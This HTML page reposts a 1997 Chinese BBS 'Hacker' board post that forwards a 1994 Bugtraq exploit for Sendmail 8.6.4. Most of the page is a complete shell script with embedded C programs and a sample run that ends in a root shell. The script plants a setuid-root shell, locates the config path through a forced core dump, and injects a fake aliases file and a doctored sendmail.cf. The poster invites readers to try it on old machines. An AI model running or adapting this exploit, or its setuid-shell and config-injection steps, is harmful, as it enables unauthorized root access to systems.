📄 network-sendmail-bug.html
字号:
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Author" content="Edward Fu">
<meta name="GENERATOR" content="Mozilla/4.05 [zh-CN] (X11; I; Linux 2.1.127 i686) [Netscape]">
<title>Freesoft Linux FAQ -- 关于sendmail老版本的一个安全漏洞</title>
</head>
<body>
发信人: yuhj (勇?戒痴·戒躁·戒网),
信区: Hacker
<br>标 题: Sendmail 8.6.4-Obtain a root shell
<br>发信站: BBS 水木清华站 (Fri Jul 11 08:21:09 1997)
<br>
<br>Send mail的问题不是“一个”问题,而是因为它的特殊位置,很多版本
<br>都会有Bug。不是说哪一个bug,而是,哪个版本有哪个bug。以下是我从
<br>http://shadowchill.com/随便抄来的一篇文章,想来已经很旧了,(我们现在
<br>用的是8.8.7 beta2)但也许哪个老机器还在用这个版本,可以试试。
<br>
<br>**************************************************************************
<br> HACK: Sendmail 8.6.4: Program and script to obtain a root
shell
<br> System: Unix
<br> Source: james abendchan (jwa@naucse.cse.nau.edu) from Bugtraq
<br>**************************************************************************
<br>
<br>What follows is a sample run exercising the latest sendmail hole and
the
<br>script used to exploit this hole. This is a re-send; I neglected
<br>to escape the "." in the sendmail script, leaving the program
<br>slightly truncated. To fix this, I have escaped the . so prior
<br>to executing this you must remove the \. (does that make any
sense? :-)
<br>There was also a small problem with nested quotes pointed out by Peter
<br>Wemm which I have fixed.
<br>
<br>This is the "small version" of the script; it assumes you have a sane
<br>sendmail.cf. In this manner, it is not a particularly robust
"breakin
<br>script" but I believe it does illustrate how to exploit the bug.
<br>
<br>This program uses "calc.c," the program mentioned by Timothy Newsham
in
<br>an earlier message. The program has been modified slightly so
that it
<br>gives better results (it would occasionally fail to locate the offset
of
<br>a config given a buggy sendmail. The fix is to force a sync()
after
<br>it generates a coredump.) The remainder of the program was written
<br>by myself and a fellow student, Steven Dake.
<br>
<br>We have held off on releasing this script until we were able to notify
<br>the people responsible for system security at NAU. Locals subscribing
<br>to this digest beware; sendmail on our machines has been patched! :-)
<br>
<br>Script started on Thu Mar 24 00:54:54 1994
<br>[pine] [1] date
<br>Thu Mar 24 00:54:57 MST 1994
<br>[pine] [2] whoami
<br>jwa
<br>[pine] [3] id
<br>uid=4473(jwa) gid=400(student)
<br>[pine] [4] ls -l sendbug.sh
<br>-rwx------ 1 jwa student
4893 Mar 24 00:46 sendbug.sh*
<br>[pine] [5] sendbug.sh
<br>Creating setid0 ...
<br>Creating calc...
<br>Scanning core image for /nau/local/lib/mail/sendmail.cf...
<br>Creating alias.sh ...
<br>Creating fake alias file...
<br>Faking alias pointer in new config file...
<br>Creating the sendmail script...
<br>Executing /usr/lib/sendmail -
<br>d4294935548.47,4294935549.116,4294935550.109,4294935551.112,4294935552.47,4294935553.115,429
<br>4935554.109,4294935555.46,4294935556.9
<br>Version 8.6.4
<br>220-pine.cse.nau.edu Sendmail 8.6.4/WHOOP-v1.0 ready at Thu, 24 Mar
1994 00:55:21 -0700
<br>220 ESMTP spoken here
<br>250 pine.cse.nau.edu Hello jwa@localhost, pleased to meet you
<br>250 <nobody>... Sender ok
<br>250 <yash>... Recipient ok
<br>354 Enter mail, end with "." on a line by itself
<br>250 AAA01803 Message accepted for delivery
<br>503 Need MAIL before RCPT
<br>503 Need MAIL command
<br>500 Command unrecognized
<br>500 Command unrecognized
<br>221 pine.cse.nau.edu closing connection
<br>setid0 is a suid shell. executing...
<br>executing /bin/csh...
<br>pine# whoami
<br>root
<br>pine# id
<br>uid=0(root) gid=0(root)
<br>pine# exit
<br>pine# end of script.
<br>
<br>.. and here's the program.
<br>
<br>#!/bin/sh
<br># exploit new sendmail bug to give us a root shell
<br># 24 mar 94 jwa/scd @nau.edu
<br># "short version"
<br># tested on sunos 5.2/sendmail 8.6.4
<br>
<br># location of sendmail
<br>SENDMAIL=/usr/lib/sendmail
<br>
<br># location of original sendmail.cf file
<br>CONFIG=/nau/local/lib/mail/sendmail.cf
<br>#CONFIG=`strings $SENDMAIL | grep sendmail.cf`
<br>
<br># program to execute as root
<br>SHELL=/bin/csh
<br>
<br>TEMPDIR=/tmp/sendbug-tmp.$$
<br>mkdir $TEMPDIR
<br>chmod 700 $TEMPDIR
<br>cd $TEMPDIR
<br>
<br>cp $SENDMAIL sm
<br>chmod 700 sm
<br>
<br>echo "Creating setid0 ..."
<br>cat > setid.c << _EOF_
<br>
<br>/* set uid to zero, thus escaping the annoying csh and solaris sh
<br> * problem..
<br> *
<br> * if (getuid() != geteuid()) {
<br> * printf("permission denied, you root-hacker you.\n");
<br> * exit(1);
<br> * }
<br> *
<br> * .. must be run euid 0, obviously. with no args it runs
/bin/sh,
<br> * otherwise it runs the 1st arg.
<br> */
<br>
<br>#include <stdio.h>
<br>
<br>main(argc, argv)
<br>int argc;
<br>char *argv[];
<br>
<br> int uid;
<br>
<br> setuid(0);
<br> setgid(0);
<br> seteuid(0); /* probabally redundant. */
<br> setegid(0);
<br>
<br> uid = getuid();
<br>
<br> if (uid != 0) {
<br> printf("setuid(0); failed! aborting..\n");
<br> exit(1);
<br> }
<br>
<br> if (argc !=2) {
<br> printf("executing /bin/sh...\n");
<br> system("/bin/sh");
<br> }
<br> else
<br> {
<br> printf("executing %s...\n", argv[1]);
<br> system(argv[1]);
<br> }
<br>
<br>_EOF_
<br>
<br>cc -o setid0 setid.c
<br>
<br>echo "Creating calc..."
<br>
<br>cat > calc.c << _EOF_
<br>/*
<br> * Determines offset in sendmail of
<br> * sendmail.cf file location.
<br> * author: timothy newsham
<br> */
<br>#include <fcntl.h>
<br>
<br>gencore()
<br>
<br> int pid;
<br> int fd[2];
<br>
<br> if(pipe(fd) < 0) {
<br> perror("pipe");
<br> exit(1);
<br> return(0);
<br> }
<br> pid = fork();
<br> if(!pid) {
<br> int f = open("./out", O_RDWR|O_CREAT, 0666);
<br> dup2(f, 1); dup2(fd[0], 0);
<br> close(f); close(fd[1]); close(fd[0]);
<br> execl("./sm","sm","-d0-9.90","-oQ.","-bs", 0);
<br> perror("exec");
<br> exit(0);
<br> } else {
<br> sleep(2);
<br> kill(pid, 11);
<br> }
<br> close(fd[0]);
<br> close(fd[1]);
<br>
<br>
<br>main(argc,argv)
<br>char **argv;
<br>int argc;
<br>
<br> unsigned int ConfFile,tTdvect,off;
<br>
<br> gencore();
<br> sync(); /* grr. */
<br> tTdvect = find("ZZZZZZZZ", "core");
<br> ConfFile = find(argv[1], "core");
<br> if(!tTdvect || !ConfFile) {
<br> return(1);
<br>
<br> }
<br> off = ConfFile - tTdvect;
<br>
<br> printf("-d%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.%d,%u.0\n",
<br> off, '/', off+1, 't', off+2, 'm', off+3, 'p', off+4, '/', off+5,
's', \
<br> off+6, 'm', off+7, '.', off+8, 'c', off+9, 'f', off+10);
<br>
<br>
<br>int find(pattern, file)
<br>char *pattern,*file;
<br>
<br> int fd;
<br> int i, addr;
<br> char c;
<br>
<br> fd = open(file, 0);
<br>
<br> i = 0;
<br> addr = 0;
<br> while(read(fd, &c, 1) == 1) {
<br> if(pattern[i] == c)
<br> i++;
<br> else
<br> i=0;
<br> if(pattern[i] == '\0') {
<br> addr -= strlen(pattern);
<br> return(addr);
<br> }
<br> addr++;
<br> }
<br> return(0);
<br>
<br>_EOF_
<br>cc calc.c -o calc
<br>
<br>echo "Scanning core image for $CONFIG..."
<br>
<br>DEBUGFLAGS=`calc $CONFIG`
<br>
<br>echo "Creating alias.sh ..."
<br>echo "#!/bin/sh
<br># this program will be executed when mail is sent to the fake alias.
<br># since solaris sh and csh and tcsh refuse to run when euid != realuid,
<br># we instead run the program we compiled above.
<br>
<br>/bin/chmod 6777 $TEMPDIR/setid0
<br>/bin/chown root $TEMPDIR/setid0
<br>/bin/sync
<br>
<br>" > alias.sh
<br>
<br>chmod 755 alias.sh
<br>
<br>echo "Creating fake alias file..."
<br>echo "yash: |$TEMPDIR/alias.sh" > aliases
<br>
<br>echo "Faking alias pointer in new config file..."
<br>egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
<br>echo "
<br># hacks follow
<br>
<br>OA/$TEMPDIR/aliases
# our fake alias file
<br>Ou0
# user ID to run as
<br>Og0
# group ID to run as
<br>DZWHOOP-v1.0" >> /tmp/sm.cf
<br>
<br>echo "Creating the sendmail script..."
<br>
<br>cat > sendmail.script << _EOF_
<br>helo
<br>mail from: <nobody>
<br>rcpt to: <yash>
<br>data
<br>yet another sendmail hole? suid whoop?
<br>\.
# oops.. delete \ prior to execution
<br>quit
<br>_EOF_
<br>
<br>echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."
<br>
<br>$SENDMAIL $DEBUGFLAGS -bs < sendmail.script
<br>
<br># give it time to execute.
<br>sleep 4
<br>
<br># cleanup in 5 seconds
<br>(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &
<br>
<br>if [ -u setid0 ]
<br>then
<br> echo "setid0 is a suid shell. executing..."
<br> cd /
<br> $TEMPDIR/setid0 /bin/csh
<br> echo "end of script."
<br> exit 0
<br>else
<br> echo "setid0 is not suid; script failed."
<br> echo "apparently, you don't have the bug. celebrate :-)"
<br> exit 1
<br>fi
<br>
<br>--
<br>
<br>
因为那个时侯我还不太明白。
<br>
<br>※ 修改:·yuhj 於 Jul 11 08:23:27 修改本文·[FROM:
wpi.WPI.EDU]
<br>※ 修改:·yuhj 於 Jul 11 08:24:33 修改本文·[FROM:
wpi.WPI.EDU]
<br>※ 来源:·BBS 水木清华站 bbs.net.tsinghua.edu.cn·[FROM: wpi.WPI.EDU]
<br>
<br>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -